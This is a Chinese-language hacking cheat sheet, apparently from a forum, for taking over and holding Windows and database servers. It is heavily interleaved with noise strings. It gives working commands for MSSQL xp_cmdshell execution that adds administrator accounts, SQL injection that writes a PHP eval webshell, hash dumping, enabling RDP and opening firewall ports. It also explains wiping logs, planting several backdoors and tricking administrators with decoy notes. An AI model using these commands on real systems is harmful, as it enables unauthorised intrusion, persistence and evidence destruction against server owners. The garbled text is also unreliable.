3 M2 U5 E$ U! Y$ z+ D# j8 v0 \3 X1.net user administrator /passwordreq:no
# K5 |. Y: E( k {+ G4 ^9 B& b这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
/ `0 _' Q, G" g2.比较巧妙的建克隆号的步骤
( G5 P m W& `+ @; R; e8 \先建一个user的用户# u# L/ I$ A8 t& T( o( e( S
然后导出注册表。然后在计算机管理里删掉& y; n/ ^; { B( p9 ?
在导入,在添加为管理员组
7 \* a+ U4 ]+ W9 V2 A8 Y `- `3.查radmin密码4 _! d; K' a5 l4 B
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg. L5 J8 y, I+ g2 U5 q
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
1 O5 z4 Q" x( v3 V- Y建立一个"services.exe"的项. m' [: j1 p3 y% J6 z. Y9 {( T' ^
再在其下面建立(字符串值), S) H( B4 W7 k: Z7 d4 q: m
键值为mu ma的全路径
9 p9 F* A P" P9 h% s5.runas /user:guest cmd# x2 q3 ~/ w8 ?; t/ ^
测试用户权限!7 W9 O# q) s3 B
6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
' e: |1 p1 h3 ~7.入侵后漏洞修补、痕迹清理,后门置放:3 u# v! _) \7 C+ P
基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门 q' d; i) \) R' \. ^2 ^. A( I
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
# \% c7 o2 T- z, E( n
6 K$ i1 z& c' O" d/ t Dfor example
$ m3 G. j, G/ G2 P' ^% i2 z
3 [ x1 ]# D1 L0 g0 d9 \4 ddeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
, e. f6 j( T, h7 Y$ s
1 K0 A3 J0 r3 Q: @) w2 ]; p4 T+ Qdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'' r7 r4 m, ^/ g7 R2 L* x
! s3 C3 k) y" Z7 r6 @
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了$ g* r3 H1 K n" B" d& z' t
如果要启用的话就必须把他加到高级用户模式
4 v$ j% I6 U& Q可以直接在注入点那里直接注入
3 J4 a5 O* }, M( q6 j# Lid=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
0 Q, E# O9 G% D5 ]% T2 p% @4 i1 L( Z然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--# U, E# ?8 a; w/ U9 F9 D
或者3 `% j) N, S5 x# y/ n( r' R, \
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
6 z* g, h( P6 P; I- G) U来恢复cmdshell。0 B! s6 r# m- _9 L* Q9 i
. N" u6 b( l! x4 R, {. `
分析器7 l2 f7 H* E, X5 \" e$ N
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--# ~: {; \; W1 X: F
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
! `# Q6 L m. I10.xp_cmdshell新的恢复办法' r( w* q- v) f, z0 K
xp_cmdshell新的恢复办法5 T7 B5 ^6 s( R) s" B z
扩展储存过程被删除以后可以有很简单的办法恢复:
9 _. o# e8 c7 R9 l" P删除5 y2 w/ {) X% J3 a
drop procedure sp_addextendedproc
" g1 _ x& T' i( |* ndrop procedure sp_oacreate
+ [( w: v r3 X2 t2 s- o% dexec sp_dropextendedproc 'xp_cmdshell'6 N! W8 a0 I( c d
% K* e$ X6 t% v A恢复
# k+ R/ p' Z7 A$ sdbcc addextendedproc ("sp_oacreate","odsole70.dll")
1 Y% ~! I6 S% y v! P1 D% W8 ^1 |dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
. @, P1 o+ S$ I4 Q: ^# S; v% G+ T: Y6 G& g3 Q" E2 X
这样可以直接恢复,不用去管sp_addextendedproc是不是存在# g; k6 @- _& g/ O' o8 N
; B( Z& N9 j2 w& S# S. Y
-----------------------------
2 f* \7 ^ M/ K9 g4 o- Z
* U! k, I5 L1 S" u1 I# V删除扩展存储过过程xp_cmdshell的语句:
# s( r6 P+ X2 I ^% Mexec sp_dropextendedproc 'xp_cmdshell'
0 c+ Y( M1 n, D" R# R" f
* U0 s2 w. ]2 a" W恢复cmdshell的sql语句4 Y' F; ]" l0 `$ e/ H
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
/ E& [7 k7 ]' \& O! t9 o
- j/ ?7 U7 v/ S+ [ [& W* o. }' @& b% o
开启cmdshell的sql语句
8 k+ ~. B m$ C* F0 Z2 c, f! M7 P
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'3 G2 b5 l% M! z* I
3 L% N2 {4 a Q9 L) W4 }
判断存储扩展是否存在% N% F& T2 ^* U
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
i }6 [# q @) p$ M) x: _返回结果为1就ok7 a1 F6 `) v6 b" e
% F5 c7 O6 n9 y& M, Q2 s9 b4 H
恢复xp_cmdshell8 |" s) H; }4 F: P
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
* {, J) N9 \( t. n返回结果为1就ok1 R U" c4 n v' V4 s" Y/ Y9 U& S
0 h" z5 K8 n) x2 W. y% V
否则上传xplog7.0.dll. Y3 z3 E# n' Y1 w, n r: S6 l; X2 i
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
% R2 T8 z! C9 U5 W. a7 l
, _" w; X6 r# B4 U$ ^( M$ @; b堵上cmdshell的sql语句( p( v. b% l+ U! {& _/ ]. K
sp_dropextendedproc "xp_cmdshel# W% L/ q; X1 r; y6 y# ]
-------------------------0 H- ^/ K3 l: D, o6 D
清除3389的登录记录用一条系统自带的命令:
* o0 j& k' i2 q* ^+ s$ i% Freg delete "hkcu\Software\Microsoft\Terminal Server Client" /f' @" a0 P! q M9 Y6 E& c
4 C( I. P E/ X( k7 K) E6 Y! U3 ~+ c
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件6 h- ~' g6 W' R+ p
在 mysql里查看当前用户的权限
7 t( o+ j: Z( sshow grants for
0 V2 b& }& R; O, w+ G
4 s4 l* m2 u) [- M, k7 v以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。8 A+ P& Y/ q- |; f+ m
$ ^; ?: A2 r! Z {6 J
' R1 O- `: s G5 |% D9 ]Create USER 'itpro'@'%' IDENTIFIED BY '123';7 v9 l3 s$ b i% `8 q# u$ Y
$ k2 S% \+ e) G4 f! R) w$ r- W: V
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
0 r/ h8 ]! `/ e; V# H/ s& Q# S# t c5 A. j- R; [- r# e' R
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0, }+ d$ A3 a5 _; v+ q
0 q: Z/ {# T5 s9 s- |6 W. O% D
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
5 y! v/ U# x, T$ p9 \2 u
3 G6 b5 U' n/ J搞完事记得删除脚印哟。6 ~; Z, K) d6 v9 C5 [
/ H7 o1 C% w' W- F
Drop USER 'itpro'@'%';
5 a( U1 z0 m, w# M0 ^* A% z; D5 A- h" N6 N
Drop DATABASE IF EXISTS `itpro` ;
$ p7 k8 d ?0 F4 F5 b. {0 b0 r1 g
) e, ]7 o/ P f' H当前用户获取system权限
]4 t. f4 H# }# dsc Create SuperCMD binPath= "cmd /K start" type= own type= interact: h H Q6 k+ q* r# y8 A
sc start SuperCMD
" B. \0 f" I! Y- s4 F$ f/ [7 m程序代码) O$ K* D) v. q' `+ K! ^
<SCRIPT LANGUAGE="VBScript">
& v4 Z9 [( v7 }; tset wsnetwork=CreateObject("WSCRIPT.NETWORK")
2 p: L8 i) q* `5 \% x$ x0 O2 Yos="WinNT://"&wsnetwork.ComputerName$ G, f# T) S7 h5 F
Set ob=GetObject(os)' P/ L1 X; k8 Q/ O3 s
Set oe=GetObject(os&"/Administrators,group")
0 }1 J% l+ A& d9 f V. U/ \1 GSet od=ob.Create("user","nosec")* K: V4 F6 R$ ` m
od.SetPassword "123456abc!@#"
7 k i9 y+ Z6 r" k! _od.SetInfo b) { w* _% F' A9 H1 k& v
Set of=GetObject(os&"/nosec",user)0 g9 v' V J+ I! q m: |0 J
oe.add os&"/nosec"
$ z) n% U8 A8 A6 {& {7 A$ k</Script>: f- ^1 u1 t. G
<script language=javascript>window.close();</script>
' }$ `/ G% v0 {/ ?, I ~) d1 @! J8 Y* b2 e5 c
, z0 F+ b1 B% x& ?
1 q2 Q& k) v( B/ I. e, P1 o
9 Z7 T0 x; e5 n- o* t* e0 S突破验证码限制入后台拿shell1 ~& w( o" p4 t7 R% {8 r
程序代码/ c8 V" E5 Z% m& q6 S: D" T# F5 e
REGEDIT4 7 Y/ b6 v$ u' }; P
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] 7 d4 C7 M6 ~& R1 F; f2 s) A4 f
"BlockXBM"=dword:00000000
$ |/ u; |6 z8 r! T- L6 J6 e# }5 A( c4 H* K: b& b' g6 B3 p0 Q8 c5 V5 d
保存为code.reg,导入注册表,重器IE
: z! g7 c2 f4 |& P! a% _0 T5 B就可以了
* h9 W/ b# B1 Q% c6 B; F9 f+ `union写马
$ p2 }/ B4 n6 c2 o3 G# V- C/ l0 N# |程序代码
. d# d. L4 C4 b9 l' u% Gwww.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
) I0 H% I$ a8 X' q
& p; @ |% ~5 n$ Z" m* G& D应用在dedecms注射漏洞上,无后台写马
$ u' y! J+ @ t2 d! Q4 {) Q) rdedecms后台,无文件管理器,没有outfile权限的时候5 j, ?) u7 F; M" d" G
在插件管理-病毒扫描里: a; ^: ~0 }9 c1 @0 [3 c
写一句话进include/config_hand.php里
5 M/ P- {0 U( C/ N2 q* j4 u程序代码; P3 |* [$ A( {8 U$ G# b) O
>';?><?php @eval($_POST[cmd]);?>
( a' U# P o- G
$ t- V {; B: a5 v, V0 ?$ x: K4 j# p& V) X) r. t! u ~
如上格式
& m O- u9 ~8 c7 F7 G' u
) O& B( ~: E3 c0 V% ^3 Soracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解& ]6 B- a2 V% w: \+ y
程序代码, N- d/ p! i1 J8 G* v
select username,password from dba_users;" A- Z, ]' `" K' D4 w9 R
' P7 B* O7 U) R6 R5 g8 o
8 l) C/ v2 q! d$ z+ d- O, fmysql远程连接用户
8 S# E7 X4 Q- p: e' X0 c6 e程序代码, p' M6 Q, H# P4 V2 ^ b
9 `# H$ \1 \% ]' H
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';* ^' Y4 ^, k% E3 ^9 R
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
% m! g1 v9 R' Q; q* XMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0* {. W. s( C( G8 y
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;- r) B! s8 Q9 F+ c0 x
, c$ v# v; i9 P5 `4 f! j3 N3 O$ @* ?; \7 U
0 P3 v6 J9 E) q0 K
9 N. y/ {2 A1 d" f+ B! \* Secho y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
/ @; r3 p k+ G
' X1 N& {* {9 D2 Z1.查询终端端口9 D4 _4 v' g: [. K) ^) M! C
7 i% N/ n4 N+ x5 Bxp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
0 }& J- t- d$ }0 O$ f" Z$ h- @, W8 C" D, P* G
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
: _% f" }2 a. l& O3 @type tsp.reg3 I. K: B% F r3 V- g. K
8 q; m, g, R) N2.开启XP&2003终端服务
+ b0 Q# C" c* u6 a7 @
, w% `: ~$ s m \* O. J8 o; @7 ~) U. }+ ~2 i$ d' e
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f3 h8 J8 K; N$ k/ I% f0 F; J
5 P4 f- e; S3 Q$ f* ^! S' r. N0 h- B3 o2 W2 ~6 F) l
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
* u2 q/ l# q' f( I' G2 Z6 }, M/ d0 e
3.更改终端端口为20008(0x4E28)# U/ i4 l* \" w& A4 ~ F* K1 N
3 f) ^0 n5 L: u# n0 {* w
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
/ k& X8 ~6 h( P+ @# u6 W( q: }, K- }9 D' B
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f& q! y& V4 a9 G! Q; t1 Q1 z; T
" D2 {/ o' Y" Y' S4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
/ x( G( D# R$ ~
; y7 h+ G$ P, M, }1 L. W% ?! U: A5 zREG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f
4 Q$ W) J' |( ^1 ~+ B) j: D, A
- y) w: _# ?" E+ s( D4 W' x- E# o# f1 t0 Y- n/ V" o5 R
5.开启Win2000的终端,端口为3389(需重启)
. _7 r2 Q& g; N: Y# X+ k. _0 k
$ x+ p- @; v9 T- J6 \4 F% lecho Windows Registry Editor Version 5.00 >2000.reg 9 Q4 d2 g2 a5 G9 `0 f. L
echo. >>2000.reg+ x) H; {. @/ u
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg 6 U5 g5 L1 E1 q$ s: N$ F
echo "Enabled"="0" >>2000.reg
' w0 [8 F. C: i$ ^echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg ! ~0 K t, N- z2 g" E: u1 f6 v5 }
echo "ShutdownWithoutLogon"="0" >>2000.reg 7 o& y+ C9 ~+ B4 o
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg " Q5 K. \1 F7 H& X5 J- @
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg 4 N( i$ m' a$ H9 S5 L& s
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
! |6 x' E$ \- s1 kecho "TSEnabled"=dword:00000001 >>2000.reg 2 b0 p) }3 ]: H, `8 A
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg ; y) F' g2 y; L# }1 _& ~8 m8 e+ \ ]
echo "Start"=dword:00000002 >>2000.reg ! _; w, ^3 l; B' {/ O. i8 E9 j
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg ! f8 S; Z w5 Q" Y
echo "Start"=dword:00000002 >>2000.reg
( q& j; c& _9 b% vecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg 6 u' e1 K7 d$ h6 V% f& t% S. ^
echo "Hotkey"="1" >>2000.reg
* _# d3 }3 Z& a/ U# K& [echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
4 S& K/ G$ r+ A7 b" o7 yecho "ortNumber"=dword:00000D3D >>2000.reg
- x& U* w; X2 Secho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
: O$ J7 q- g6 G8 lecho "ortNumber"=dword:00000D3D >>2000.reg
4 |, M- |% ?9 N5 x7 ?
* n3 X" C1 r3 g& g3 C1 T6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)( v ]+ _7 J. N& `) B7 L' G6 d
, ^7 A: o# y6 w2 O7 a
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf. ` y c* D! ^" N7 @
(set inf=InstallHinfSection DefaultInstall)
5 t& s0 Y' M1 o5 u* }) d0 ^echo signature=$chicago$ >> restart.inf
. B( U% U. M$ L( ?; k* lecho [defaultinstall] >> restart.inf% B( c. F) ~4 [& f
rundll32 setupapi,%inf% 1 %temp%\restart.inf
1 Q5 l" R- u) {, E4 h8 N# }9 \, G% a) x# L7 H+ a
- X& ~$ x3 k$ ]+ P8 n8 w+ p
7.禁用TCP/IP端口筛选 (需重启)
1 G: r$ |# `. W2 C4 U6 b$ @8 v9 b( O0 h; c' y! S) R+ p
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f/ J$ C; \, o3 A9 U: @; j% e
: s5 V- J& @( Z" A
8.终端超出最大连接数时可用下面的命令来连接
( M. F; h* [7 J! ^/ ^0 ^7 d0 Z6 X: x
mstsc /v:ip:3389 /console! @2 A8 N8 [0 F& P; ^ n' A4 H# l
8 j* J& W' j, F9.调整NTFS分区权限
" ^1 Y) a( ~" K. t+ }; c* R' f; o
' e) m! r' X4 X9 I4 icacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)8 q; l% q7 g1 p7 S# `$ n7 H; e
2 r/ X/ i' y0 z, J+ y, U; V' x* ecacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)% J7 ]9 i4 v" m& t0 ?
3 d) W% l- s$ d" t! U+ ]7 ^
------------------------------------------------------
6 c& Z5 j7 R9 X3389.vbs 5 Q4 P7 l9 ?* S0 t3 {
On Error Resume Next
- \4 l2 U% @5 Y" }const HKEY_LOCAL_MACHINE = &H80000002
' T- m8 X* [) D( ?3 A: l% YstrComputer = ".". T2 K% P; u# i+ k v" j
Set StdOut = WScript.StdOut
" \" J8 ?3 `- l( Z) rSet oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
/ ^; r$ g5 Q; r1 b2 MstrComputer & "\root\default:StdRegProv")( r' ]- X- O' X( h5 p
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
5 h2 k+ U! I: Q7 n$ U+ i5 ]oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
; \" \& ?2 x" ?+ m! ]2 I) GstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
6 Q$ o( }* A C0 r e7 j3 Q: _oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath5 N: Q x3 B' K9 [9 u1 ?8 _
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
1 n) E |$ P) n) }4 C6 Y* xstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
4 v* X3 J; y0 I, A+ l/ HstrValueName = "fDenyTSConnections"
" x F+ ]. k6 @! Z8 j0 idwValue = 00 g. q0 j% s* S$ d @9 B$ ~9 r% n
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue# l8 g1 H& o$ _& A; H7 S* T2 d
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"8 L7 y7 V- h( ^' R0 t7 L2 y- r7 s
strValueName = "ortNumber"
# b# P) K* G* q& [dwValue = 33896 F8 O' O# s. b: [: k
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
! W+ A( ~( z& ^, g$ D& r+ a R9 ]- J3 MstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
' u3 r7 \9 B2 s q$ q/ O" F. nstrValueName = "ortNumber": ^9 w$ N5 H1 M t
dwValue = 33895 Q9 o3 ]% \, P6 Y; S7 N
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
) F. E4 x3 q3 A* fSet R = CreateObject("WScript.Shell") 1 Q( u% N) Z& t: q" ]
R.run("Shutdown.exe -f -r -t 0")
1 Y/ I& ~9 P; d0 S: |
7 b! T; ~3 K+ y删除awgina.dll的注册表键值
2 ?. s2 |, U1 k. H. C- ~2 W; O程序代码2 d: W8 F Q5 P; X- ?6 T5 r6 S
. g) A. q; o, K$ }' k& _, i, g6 jreg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
8 G5 j$ E6 _- `8 ]5 u" b+ j0 N% c# i& c6 d
; X- o, R2 J' c+ T: s2 l) M. I" G+ |6 H) v* O
1 F% `! z/ C! y4 }/ b+ d% g- {3 \
程序代码; \6 _8 A& ]) n; a. f7 g6 n, s2 v
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
, D6 j0 V5 H8 q) p4 Y
" j; G5 y: o$ e( C# `2 w设置为1,关闭LM Hash
+ V6 }& I3 u4 d. G- G
4 F# T1 z( ~* `7 U/ Q% W数据库安全:入侵Oracle数据库常用操作命令! S) _: N) |) V5 L; u, R$ n2 A Q$ W
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。
5 R' z W1 s! F) V G1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。5 v# j- v: Z, }( c0 o6 L. O" b
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
, V- M+ O1 k, f3 o; z% _' [$ N3、SQL>connect / as sysdba ;(as sysoper)或
* X- Y" e( P$ R; hconnect internal/oracle AS SYSDBA ;(scott/tiger)
2 x7 o c2 P0 x2 Oconn sys/change_on_install as sysdba;
, Y5 [0 S6 }0 y4、SQL>startup; 启动数据库实例
O' N' g4 A C1 l" H' U* C3 h5、查看当前的所有数据库: select * from v$database;! S5 Z7 [% t c
select name from v$database;
. H2 T' a4 M8 k6、desc v$databases; 查看数据库结构字段6 h9 E) r5 g) ]" x9 b' O( `
7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:, Z" Z/ {; n. r1 y. q W2 E
SQL>select * from V_$PWFILE_USERS;
& O' ^) W9 Z9 bShow user;查看当前数据库连接用户
4 Q- n7 `1 F1 }" U* |1 X$ K8、进入test数据库:database test;
2 X5 N3 C& k8 H, }- a' a9、查看所有的数据库实例:select * from v$instance;
! X4 E0 O# g d0 W# B# b如:ora9i
/ Z1 p6 h" J* u8 W. M1 n- r10、查看当前库的所有数据表:$ }, j: o7 F9 @
SQL> select TABLE_NAME from all_tables;% h( P+ ?& m* ]5 r7 |7 p. r: |
select * from all_tables; ~3 R9 t, q( D }5 W
SQL> select table_name from all_tables where table_name like '%u%';
# z7 n& V- r) a8 F6 r3 S* vTABLE_NAME
; J' z/ j6 o9 k4 N6 I! W! w" {------------------------------: ]1 C( V" o9 \2 A
_default_auditing_options_/ G) l Y" I( [ d X' `
11、查看表结构:desc all_tables;$ H! V+ m) B( j: {9 J$ E+ h3 D- @
12、显示CQI.T_BBS_XUSER的所有字段结构:
9 Z! T- m7 b* y0 Edesc CQI.T_BBS_XUSER;# H' g7 ^) t% B2 Q
13、获得CQI.T_BBS_XUSER表中的记录:
" N. Z! U. C6 iselect * from CQI.T_BBS_XUSER;4 Q7 D: ^, T1 z8 B
14、增加数据库用户:(test11/test)
( G: V8 ]" x* W- vcreate user test11 identified by test default tablespace users Temporary TABLESPACE Temp;) U; c3 W6 ^( m8 }0 ^) r
15、用户授权:
; X7 D& W7 r7 @* _: fgrant connect,resource,dba to test11;
6 \) l. Q* q6 Sgrant sysdba to test11;
; S6 H( k- {. i+ Rcommit;
/ _3 x5 {+ _. W+ ~8 a16、更改数据库用户的密码:(将sys与system的密码改为test.)
: B* V4 V7 l! G+ D& Q6 p) B1 |alter user sys indentified by test;
+ m* L; s1 [! ~; Talter user system indentified by test;
0 j2 b3 L) V q# o- E
8 v/ u% U- Y& l$ ` y8 z+ k& ?applicationContext-util.xml
7 r1 `7 s3 A+ Z2 j9 n+ ^2 `2 I& K9 YapplicationContext.xml
B* f5 [5 ~ G* B* h7 `8 G, estruts-config.xml4 \! n7 O: r& d# U
web.xml3 g( ~& Q6 n% B5 \2 A! j
server.xml+ o( ^: A6 A7 n$ [5 y! f
tomcat-users.xml
# W2 k z C8 H- l3 k: ^" Nhibernate.cfg.xml( W2 x3 K* l. ] s0 u
database_pool_config.xml/ r5 ^1 K5 N* {* ~$ ?' u
) x3 w$ Q1 N8 D6 u# Z
' Z% ~5 d* F, c6 a\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置% C! b; V- M$ a% g
\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini
* x9 Y& _6 x0 n- c7 o- e4 b\WEB-INF\struts-config.xml 文件目录结构
4 k7 A4 _+ K! z' P" M9 ~" C
. T! t1 M* {7 j0 v3 _spring.properties 里边包含hibernate.cfg.xml的名称, C9 e9 j1 ^2 X5 X& T
4 Q) w5 K0 x) \0 A
0 ]! |% x, j& JC:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
; R- F+ h/ i7 b$ L
* S0 X% Y7 r) Z3 w' c如果都找不到 那就看看class文件吧。。
5 l! x! A% V" A/ q# d* d7 F3 l" p; N+ Y& G
测试1:
% |0 a( {7 ^- t1 l9 b% z8 ^9 kSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
8 [, a" P; I2 Y: ]- n
% D" {: r) G3 E2 N! _测试2:
8 W& Y7 R5 x! O0 B4 Q
' M6 n: x- d3 w3 J- Xcreate table dirs(paths varchar(100),paths1 varchar(100), id int): u% u( _7 a: e( n" S/ X
/ [, K7 e6 n& N5 d& E
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--* X2 I/ J3 |5 K+ |
& ~9 Y7 G$ u, }) v4 Y3 E1 A5 H
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
, j% L3 T) I/ k
3 U6 B8 N% \ K4 U A- X' T; P. m查看虚拟机中的共享文件:
% l6 t# B7 i3 ~ g$ ^% U在虚拟机中的cmd中执行8 h! Q C* R4 W9 _6 H
\\.host\Shared Folders
' A9 T4 l, U4 h) ^2 N2 {0 F/ M- R# Q% c, R; Y- ~6 C; x
cmdshell下找终端的技巧
: Z' M% J2 H9 I3 y! ]; I7 O找终端:
7 [2 w" g! Q6 h* K! r1 w第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
9 O' V& C# x2 p \5 p/ t o" ` 而终端所对应的服务名为:TermService # a, Z" `. o; t% W
第二步:用netstat -ano命令,列出所有端口对应的PID值! . W& W0 ^) D( C4 D* p$ v
找到PID值所对应的端口: i1 E' `- \8 V( s6 J
% ^8 ~( j! I: G( ~ D% o查询sql server 2005中的密码hash
5 A8 c: e M* {/ T; o3 y" `7 tSELECT password_hash FROM sys.sql_logins where name='sa'8 K+ ^7 R2 U: a, X3 F
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a& M9 d: K+ O5 N
access中导出shell8 p. c! F) u6 N7 L) z2 d0 t* I
& U/ w7 o" o# V
